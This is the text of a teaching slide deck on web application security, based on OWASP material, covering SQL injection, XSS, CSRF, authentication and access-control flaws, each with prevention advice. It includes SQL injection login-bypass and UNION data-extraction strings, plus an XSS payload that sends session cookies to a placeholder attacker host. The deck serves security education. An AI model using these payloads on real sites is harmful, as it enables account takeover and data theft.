Web Application Security

in a nutshell

An ultra-compact intro (or refresher)

Created by Björn Kimminich / @bkimminich

Björn Kimminich

Famous last words...

“Nobody would bother to hack us.”
“Our Firewall, IDS and IPS will keep us safe.”
“We will add security to the system later.”
“What's the worst that could actually happen?”

Injection

Injection means...

...tricking an application into including unintended commands in the data sent to an interpreter.

Interpreter means...

...a program that takes a String and interprets it as a command.

Interpreters are used for...

  • SQL
  • HQL
  • OS Shell
  • LDAP
  • XPath
  • ...

Bypassing Authentication

with SQL Injection

String query = "SELECT id FROM users " +
               "WHERE name = '" + req.getParameter("username") + "'" +
               "AND password = '" + req.getParameter("password") + "'";
                        

The indented use case results in a query like this:


SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
                        

Attack Examples

on authentication queries

Disabling password check for a known username:


SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'
                        

Logging in without even knowing a username:


SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'
                        

Spying out Data

with SQL Injection

String query =
            "SELECT id,author,title,price FROM books " +
            "WHERE title LIKE '%" + req.getParameter("query") + "%'";
                        

The indented use case results in a query like this:


SELECT id,author,title,price FROM books WHERE title LIKE '%tangled web%'
                        

Attack Examples

on data retrieval queries

Probing for right number of result set columns:


SELECT [...] WHERE title LIKE '%' UNION SELECT null FROM users--%'
                        

SELECT [...] WHERE title LIKE '%' UNION SELECT null,null FROM users--%'
                        

SELECT [...] WHERE title LIKE '%' UNION SELECT null,null,null FROM users--%'
                        

Using known column names to extract data:


SELECT [...] WHERE title LIKE '%' UNION SELECT name,password,email FROM users--%'
                            

Preventing Injection

  • Avoid Interpreters
  • Bind Variables
  • Prepared Statements
  • Least Privileges for app DB user
  • White List Input Validation

Cross Site Scripting (XSS)

Malicious Code is sent...

...to an innocent user's browser through

  • a form field or URL (Reflected XSS)
  • a previously stored DB record (Persistent XSS)
  • a DOM element of a rich JS client (Local XSS)

Possible Damage from XSS

  • stolen user session
  • stolen sensitive data
  • rewriting web page
  • redirecting to malicious site

XSS Vulnerability Example


http://bookwo.rm/titles/search?keywords=raspberry%20pi
                        

The indented use case is to display the keywords above the results:


<%
String keywords = request.getParameter("keywords");
List<Book> results = titleSearchService.findByKeywords(keywords.split(" "));
%>
There are <%=results.count()%> results for your search by <em><%=keywords%></em>
<table>
    <% for (Book book : results) { %>
      // render result as table rows
    <% } %>
</table>
                        

XSS Attack Examples

Probing for XSS Vulnerability


<script>alert(1)</script>
                        

Stealing User Session


<script>
    new Image().src="http://my.evil-si.te/hijack.php?c="+encodeURI(document.cookie);
</script>
                        

Site Defacement


<script>document.body.background="http://my.evil-si.te/image.jpg";</script>
                        

Preventing XSS

  • Avoid including user supplied input into output
  • Output encode all user supplied input
  • Sanitize HTML where user supplied HTML is unavoidable
  • White List Input Validation

Cross Site Request Forgery (CSRF)

A Victim's Browser...

...is tricked into issuing a command to a vulnerable webapp. This is caused by browsers automatically including user authentication data with each request.

  • Session Cookie
  • Basic Authentication
  • Authorization HTTP Header
  • ...

CSRF Attack Examples

Preventing CSRF

  • Add a secret token to all sensitive requests
  • This token must not be automatically submitted
  • Require secondary authentication for sensitive functions
  • Beware exposing the token in a Referer HTTP header

Make sure your application has no XSS holes that could be exploited to attack others!

Broken Authentication

Typical Authentication Flaws

  • Allowing weak passwords
  • Storing SSL certificate insecurely
  • Credentials passed via insecure http connection
  • Expose session id's in URLs, via unsafe network, logs, ...

Side Channel Attack Vectors

  • Change Password
  • “Remember me”
  • Forgot Password
  • Secret Questions

Classical Broken Authentication...

...due to starting login process on unencrypted page

http://sick-cure-ba.nk/login.do
                    

POST /login.do HTTP/1.1
Host: sick-cure-ba.nk
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded

username=bjoern&password=secret
                    

Weak hashes put passwords at risk...

...as do unsalted strong hash algorithms
id username password
1 admin d033e22ae348aeb5660fc2140aec35850c4da997
2 bjoern 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b
3 localhorst 0f59bd4122f0c02002ec578e4eec306ed48ff2ad0105a307a6dc98c0e9a54fe4 64e5f807236edce12134067a0b6690891e82490b2b9fa7b4171db43ee8cb4006

Cracking unsalted hashes with a Rainbow Table attack is fast, even though the last two of them might seem sufficiently secure given their 256 and 512bit length. You can easily crack weak password hashes online, e.g. at CrackStation.

Securing Authentication

  • Centralized and standardize authentication
  • Protect credentials with SSL/TLS1
  • Use strong mechanism with multiple factors
  • Do not store or log unencrypted credentials2

1Serve a HSTS header from your site to protect against protocol downgrade attacks. Also consider applying to have your domain included in the HSTS preload list of Chromium.

2 Use only brute-force resistant algorithms for password hashing, preferrably Argon2 the winner of the Password Hashing Competition.

Broken Access Control

Common Authorization Mistakes

  • Hiding object references instead of restricting access
  • Displaying only authorized links and menu choices
  • Trusting client-side access control mechanisms
  • Lack of server-side verification of user privileges

Request Tampering for Privilege Escalation...

...and finding all kinds of Access Control Issues

http://logistics-worldwi.de/showShipment?id=40643108
                        

http://my-universi.ty/api/students/6503/exams/view
                        

http://document-warehou.se/landingpage?content=index.html
                        

Securing Access Control

  • Never rely on “Security by obscurity”
  • Replace direct object references with temporary mappings
  • Restrict data and functionality access to authorized users
  • Enforce user or role based permissions

Broken Environment

Possible Environmental Vulnerabilities

  • Software Libraries
  • Application Server
  • Web Server
  • Operating System
  • ...

Known Vulnerability Examples

Component Vulnerability Affected
OpenSSL Obtain sensitive information from process memory via crafted packets that trigger a buffer over-read (Heartbleed) 1.0.1 - 1.0.1f, 1.0.2-beta, 1.0.2-beta1
Unix Bash Execution of arbitrary commands on vulnerable Bash, potentially compromising the entire system (Shellshock) CGI, OpenSSH, DHCP, QMail, ...
Struts Remote manipulation of the ClassLoader via the class parameter, which is passed to the getClass() method before 2.3.16.1
Struts Wildcard cookiesName not properly restricts access to the getClass() method, which allows ClassLoader manipulation before 2.3.16.2

Protection from Environmental Vulnerabilities

  • Monitor security of used components
  • Keep up with patches for used components
  • Remove unnecessary stuff on all levels
  • Restrict use of unapproved components

Java and .NET project dependencies can be monitored by OWASP Dependency Check which relies on the NIST National Vulnerability Database. For Javascript and Node.js modules there is Retire.js which is updated manually via its GitHub project. Both tools integrate well with typical software build processes.

Q&A

Credits

Presentation created with reveal.js

The HTML Presentation Framework

Based on free material provided by OWASP

The Open Web Application Security Project

Background image based on Digital Shodan

by sephiroth-kmfdm

THE END

by Björn Kimminich / kimminich.de

These slides are publicly available on GitHub and Slideshare.